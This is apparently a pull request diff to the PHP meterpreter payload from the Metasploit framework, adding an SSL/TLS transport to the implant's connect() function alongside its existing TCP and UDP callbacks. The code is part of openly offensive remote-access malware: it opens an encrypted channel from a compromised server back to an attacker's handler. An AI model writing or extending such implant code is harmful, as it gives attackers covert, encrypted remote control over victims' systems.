### PR TITLE
Implement TLS transport for PHP meterpreter

### DIFF
--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -910,12 +910,27 @@ function connect($ipaddr, $port, $proto='tcp') {
     # unnecessarily, but fall back to socket_create if they aren't available.
     if (is_callable('stream_socket_client')) {
         my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
-        $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
-        my_print("Got a sock: $sock");
-        if (!$sock) { return false; }
-        if ($proto == 'tcp') {
+        if ($proto == 'ssl') {
+            $sock = stream_socket_client(
+                "{$proto}://{$ipaddr}:{$port}",
+                $errno,
+                $errstr,
+                5,
+                STREAM_CLIENT_ASYNC_CONNECT
+            );
+            if (!$sock) { return false; }
+            my_print("Got a sock: $sock");
+            register_stream($sock);
+            stream_set_blocking($sock,0);
+        } elseif ($proto == 'tcp') {
+            $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
+            if (!$sock) { return false; }
+            my_print("Got a sock: $sock");
             register_stream($sock);
         } elseif ($proto == 'udp') {
+            $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
+            if (!$sock) { return false; }
+            my_print("Got a sock: $sock");
             register_stream($sock, $ipaddr, $port);
         } else {
             my_print("WTF proto is this: '$proto'");
@@ -923,7 +938,11 @@ function connect($ipaddr, $port, $proto='tcp') {
     } else
     if (is_callable('fsockopen')) {
         my_print("fsockopen");
-        if ($proto == 'tcp') {
+        if ($proto == 'ssl') {
+            $sock = fsockopen("{$proto}://{$ipaddr}:{$port}");
+            register_stream($sock);
+            stream_set_blocking($sock,0);
+        } elseif ($proto == 'tcp') {
             $sock = fsockopen($ipaddr,$port);
             if (!$sock) { return false; }
             if (is_callable('socket_set_timeout')) {


### PR DESCRIPTION
This is the payloads section of MSF #7669

Implement SSL transport via streams, atop the current version of
PHP meterpreter (with GUIDs and all).

This version does everything in a single file, relying on the MSF
payload generation component to perform string substitution in
order to convert the "connect($ipaddr, $port, $proto='tcp')" to
"function connect($ipaddr, $port, $proto='ssl')."


----
Note: i did something stupid to my submodules, and despite @bcook-r7's helpful suggestion still polluting the repo a bit.
Feel free to add a commit fixing this mess if you know how.